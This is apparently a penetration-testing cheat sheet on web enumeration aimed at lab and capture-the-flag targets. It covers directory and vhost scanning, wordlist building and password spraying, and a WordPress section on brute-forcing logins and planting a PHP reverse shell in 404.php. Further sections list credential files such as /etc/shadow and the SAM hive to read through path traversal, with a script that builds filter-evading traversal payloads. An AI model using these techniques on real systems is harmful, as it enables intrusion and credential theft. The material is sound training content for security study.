WEB ENUMERATION TOOLS AND TECHNIQUES
DIRB
With proxy (-p) and output file (-o); note that in dirb the upper-case -P is proxy authentication, not the proxy address
| Command | Description |
|---|---|
| dirb http://ip | Generic search |
| dirb http://10.11.1.222 -p 10.11.1.222:8080 -o dirb_8080_10.11.1.222.txt | Through a proxy, saving results to a file |
| BACK TO WEB ENUMERATION | REFERENCE PAGE | 
GOBUSTER
With directory scan (dir), virtual host scan (vhost) and DNS subdomain scan (dns)
| Command | Description |
|---|---|
| gobuster dir -u http://10.11.1.222:8080 -w /usr/share/wordlists/dirb/big.txt | Directory |
| gobuster vhost -u http://crafty.htb -r -k -w /usr/share/seclists/Discovery/DNS/namelist.txt --append-domain | VHOST (-r follow redirects, -k skip TLS verification, --append-domain appends crafty.htb to each word) |
| gobuster dns -d analysis.htb -w /usr/share/seclists/Discovery/DNS/namelist.txt -r analysis.htb:53 -t 50 | DNS (-d target domain, -r resolver to query, -t threads) |
| gobuster dir -u http://internal.analysis.htb/dashboard -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 50 --follow-redirect --add-slash -x php | Directory with .php extension appended (-x), trailing slash added and redirects followed |
DIRBUSTER
DirBuster is a GUI for directory enumeration
| Command | Description |
|---|---|
| dirbuster | Start GUI |
WORDLISTS
| Wordlist | Description |
|---|---|
| /opt/useful/SecLists/Discovery/Web-Content/directory-list-2.3-small.txt | Directory/page wordlist |
| /opt/useful/SecLists/Discovery/Web-Content/web-extensions.txt | Extensions wordlist |
| /opt/useful/SecLists/Discovery/DNS/subdomains-top1million-5000.txt | Subdomain wordlist |
| /opt/useful/SecLists/Discovery/Web-Content/burp-parameter-names.txt | Parameter names wordlist |
CREATE WORDLISTS
| Command | Description |
|---|---|
| cewl -w searchWordlists.txt -d2 -m 3 search.htb | CeWL on a website (-d2 spider depth 2, -m 3 minimum word length, -w output file) |
| crackmapexec smb search.htb -u searchWordlists.txt -p 'IsolationIsKey?' | Use the generated list as usernames against SMB with a known password (quote the password so the shell does not expand the ?) |
| axel | Command-line download accelerator for Linux, handy for fetching large wordlists |
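How a CeWL-style list is built, as an added example that is not part of the original page and not CeWL's own code: strip the tags, skip script and style bodies, keep words of at least -m characters, and deduplicate in first-seen order. The HTML below is a constructed sample so the script runs offline; CeWL itself spiders the live site to the depth given by -d. The output file name matches the cewl row above so it can be fed straight to crackmapexec -u.

```python
import re
from html.parser import HTMLParser

MIN_LEN = 3  # same idea as "cewl -m 3": drop words shorter than this


class TextExtractor(HTMLParser):
    """Collect visible text from HTML, ignoring <script> and <style> bodies."""

    def __init__(self):
        super().__init__()
        self.chunks = []
        self._skip_depth = 0

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self._skip_depth += 1

    def handle_endtag(self, tag):
        if tag in ("script", "style") and self._skip_depth:
            self._skip_depth -= 1

    def handle_data(self, data):
        if not self._skip_depth:
            self.chunks.append(data)


def extract_words(html, min_len=MIN_LEN, lowercase=False):
    """Return unique words of length >= min_len, in the order they were first seen."""
    parser = TextExtractor()
    parser.feed(html)
    text = " ".join(parser.chunks)
    seen, words = set(), []
    for word in re.findall(r"[A-Za-z0-9]+", text):
        if lowercase:
            word = word.lower()
        if len(word) >= min_len and word not in seen:
            seen.add(word)
            words.append(word)
    return words


# Constructed sample page for a hypothetical company site; not fetched from anywhere.
SAMPLE_HTML = """<html><head><title>Search Ltd</title>
<style>.banner { color: red }</style></head>
<body><h1>Welcome to Search</h1>
<p>Our team: Alice Smith, Bob Jones. Contact IT at extension 4410.</p>
<script>var tracking = "notAWord";</script>
</body></html>"""

if __name__ == "__main__":
    # One word per line, the same shape cewl -w writes; usable as crackmapexec -u input.
    words = extract_words(SAMPLE_HTML)
    with open("searchWordlists.txt", "w") as fh:
        fh.write("\n".join(words) + "\n")
    print("\n".join(words))
```

Two-letter tokens such as "to" and "IT" fall under the minimum length, and the word inside the script tag never reaches the list. Pass lowercase=True when the target treats usernames case-insensitively, so case variants do not pad the list.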
ENUMERATION
| Command | Description |
|---|---|
| curl http://ip/robots.txt | Take a look at robots.txt for disallowed paths the site wants crawlers to skip |
| whatweb 10.11.1.101 | Fingerprint the web stack (server, CMS, frameworks, versions) |
GOOGLE BOTS
Set one of these as your User-Agent header; some sites serve crawlers different content than browsers
| User-Agent | Description |
|---|---|
| Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) | Newer version |
| Googlebot/2.1 (+http://www.google.com/bot.html) | Older version |
WORDPRESS
Attacks specific to WordPress
| Command | Description |
|---|---|
| wpscan --url http://10.11.1.234 --passwords /usr/share/wordlists/rockyou.txt --usernames admin | Brute force the login for user admin |
| [!] Valid Combinations Found: Username: admin, Password: password | Successful result |
| https://www.hackingarticles.in/wordpress-reverse-shell/ | Reference |
| Change the 404 page: Dashboard --> Appearance --> Theme Editor --> 404.php | Where to replace the 404 template with a PHP reverse shell |
| nc -nvlp 80 | Set up the listener before triggering |
| curl http://10.11.1.234/wp-content/themes/twentytwelve/404.php | Trigger the reverse shell (path depends on the active theme) |
| /usr/share/seclists/Web-Shells/WordPress/plugin-shell.php | Common web shell, installed as a plugin |
LFI / RFI
Local File Inclusion (LFI) / Remote File Inclusion (RFI)
The following are common operating system files to request; which ones come back also tells you the OS
| Path | OS |
|---|---|
| https://insecure-website.com/loadImage?filename=..\..\..\windows\win.ini | Example request |
| C:\windows\win.ini | Windows |
| C:\windows\system.ini | Windows |
| C:\windows\iis.log | Windows |
| C:\windows\System32\Drivers\etc\hosts | Windows |
| C:\Windows\system32\config\SYSTEM | Windows |
| C:\windows\debug\netsetup.log | Windows |
| C:\windows\debug\sammui.log | Windows |
| C:\windows\debug\netlogon.log | Windows |
| C:\windows\debug\passwd.log | Windows |
| C:\windows\system32\winevt\logs\system.evtx | Windows |
| C:\windows\system32\winevt\logs\Windows PowerShell.evtx | Windows |
| C:\windows\WindowsUpdate.log | Windows |
| C:\windows\system32\calc.exe | Windows (existence check) |
| C:\windows\system32\windowspowershell\v1.0\powershell.exe | Windows (existence check) |
| C:\windows\ccm\logs\filesystemfile.log | Windows |
| C:\users\administrator\appdata\local\recently-used.xbel | Windows |
| C:\users\administrator\desktop\desktop.ini | Windows |
| C:\windows\panther\unattend.xml | Windows |
| C:\windows\panther\unattend\unattend.xml | Windows |
| C:\windows\repair\sam | Windows |
| C:\windows\system32\tasks\daily | Windows |
| C:\windows\panther\sysprep.inf | Windows |
| /etc/passwd | Linux |
| /etc/shadow | Linux |
| /etc/crontab | Linux |
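Turning the file list into traversal payloads and confirming a hit, as an added example not taken from the original page: build_payloads() wraps one relative path in the plain ../ form plus the encodings that commonly get past naive filters, and looks_included() checks the response body for content that only the real file contains, which is more reliable than a 200 status. The MARKERS table and both response bodies are constructed here; sending the request (requests, curl, Burp Repeater) is left to the caller.

```python
from urllib.parse import quote

# Text that appears only if the file really was read back (constructed table).
MARKERS = {
    "windows/win.ini": "[fonts]",
    "windows/system.ini": "[drivers]",
    "windows/System32/Drivers/etc/hosts": "localhost",
    "etc/passwd": "root:x:0:0",
    "etc/shadow": "root:",
    "etc/crontab": "SHELL=",
}


def build_payloads(target, depth=3):
    """Traversal strings for one relative path such as 'etc/passwd' or 'windows/win.ini'.

    Each depth gets the plain form plus the encodings that commonly get past
    naive filters; the caller decides which parameter to put them in.
    """
    is_windows = target.lower().startswith("windows")
    win_target = target.replace("/", "\\")
    payloads = ["/" + target]                       # absolute path, when no traversal is needed
    if is_windows:
        payloads.append("C:\\" + win_target)        # absolute Windows path
    for d in range(1, depth + 1):
        payloads.append("../" * d + target)                            # plain
        payloads.append("..\\" * d + win_target)                       # backslash separators
        payloads.append("%2e%2e%2f" * d + quote(target))               # URL-encoded dots and slashes
        payloads.append("%252e%252e%252f" * d + quote(quote(target)))  # double-encoded, for apps that decode twice
        payloads.append("....//" * d + target)                         # survives a single, non-recursive "../" strip
    return payloads


def looks_included(body, target):
    """True when the response body contains the content expected from `target`."""
    marker = MARKERS.get(target)
    return marker is not None and marker in body


# Constructed responses standing in for what a server sent back.
RESP_WIN_INI = "; for 16-bit app support\n[fonts]\n[extensions]\n[mci extensions]\n[files]\n"
RESP_NOT_FOUND = "<html><body>Image not found</body></html>"

if __name__ == "__main__":
    # Candidate URLs for the loadImage endpoint in the example row above.
    base = "https://insecure-website.com/loadImage?filename="
    for p in build_payloads("windows/win.ini", depth=2):
        print(base + p)
    print(looks_included(RESP_WIN_INI, "windows/win.ini"))    # True
    print(looks_included(RESP_NOT_FOUND, "windows/win.ini"))  # False
```

Run the payloads through a proxy and compare bodies, not status codes: many applications answer 200 with an error page for a missing file, and a marker hit on win.ini or /etc/passwd also settles which OS you are dealing with before you spend time on the longer list above.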
CURL
Include headers (-i)
HTTP response headers can include things like: server name and version, cookies, date of the document, HTTP version and more.
With non-HTTP protocols, the "headers" are the other server communication.
| Command | Description |
|---|---|
| curl -i ip | Generic syntax |
| curl -i http://ip | Use IP |
| curl -i http://url.com | Use URL |
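Reading that output with something better than eyeballs, as an added example that is not part of the original page: the parser splits curl -i output into status, ordered headers and body (a list, because Set-Cookie legitimately repeats), and findings() pulls out what an enumerator cares about: version strings in Server and X-Powered-By, cookies missing HttpOnly, Secure or SameSite, and absent hardening headers. The sample response is constructed; pipe real output in with curl -si. With -L, curl prints one head per hop and this parses only the first.

```python
import sys

# Constructed sample in the shape "curl -i http://ip" prints; not a real server's reply.
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Date: Mon, 01 Jan 2024 10:00:00 GMT\r\n"
    "Server: Apache/2.4.41 (Ubuntu)\r\n"
    "X-Powered-By: PHP/7.4.3\r\n"
    "Set-Cookie: PHPSESSID=abc123; path=/\r\n"
    "Set-Cookie: remember=1; Path=/; HttpOnly; Secure\r\n"
    "Content-Type: text/html; charset=UTF-8\r\n"
    "\r\n"
    "<html><body>hello</body></html>\r\n"
)

# Hardening headers whose absence is worth noting during enumeration.
EXPECTED_HEADERS = (
    "strict-transport-security",
    "content-security-policy",
    "x-frame-options",
    "x-content-type-options",
)


def parse_response(raw):
    """Split curl -i output into status code, ordered (name, value) headers and body."""
    raw = raw.replace("\r\n", "\n")
    head, _, body = raw.partition("\n\n")
    lines = head.split("\n")
    status = int(lines[0].split()[1])          # "HTTP/1.1 200 OK" -> 200
    headers = []
    for line in lines[1:]:
        name, _, value = line.partition(":")   # split on the first colon only
        headers.append((name.strip(), value.strip()))
    return {"status": status, "headers": headers, "body": body}


def findings(parsed):
    """Version disclosure, weak cookie flags and missing hardening headers."""
    out = []
    for name, value in parsed["headers"]:
        lname = name.lower()
        if lname in ("server", "x-powered-by") and any(ch.isdigit() for ch in value):
            out.append(f"version disclosure: {name}: {value}")
        if lname == "set-cookie":
            cookie = value.split(";", 1)[0].split("=", 1)[0].strip()
            flags = {p.strip().split("=", 1)[0].lower() for p in value.split(";")[1:]}
            for want in ("httponly", "secure", "samesite"):
                if want not in flags:
                    out.append(f"cookie {cookie} lacks {want}")
    present = {name.lower() for name, _ in parsed["headers"]}
    for want in EXPECTED_HEADERS:
        if want not in present:
            out.append(f"missing {want}")
    return out


if __name__ == "__main__":
    # Real use:  curl -si http://10.11.1.222 | python3 curl_headers.py
    raw = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_RESPONSE
    parsed = parse_response(raw)
    print(f"status {parsed['status']}")
    for line in findings(parsed):
        print(" -", line)
```

A session cookie without HttpOnly is the one to remember for later: it is the cookie an XSS finding can steal, and Burp's cookie jar will already be holding it.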
BURPSUITE
Common and useful generic configurations
| Item | Description |
|---|---|
| /etc/hosts | Add the target hostname here so the browser and Burp resolve it (local DNS) |
| Intruder | Create payloads for various inputs (fuzzing, brute force) |
| Repeater | Edit and resend a single request by hand and inspect the reply |
| Cookie jar | Modify or delete cookies sent by a website |
| Proxy --> Options --> Intercept Server Responses | Always check this box, otherwise only requests are intercepted and replies pass through unmodified |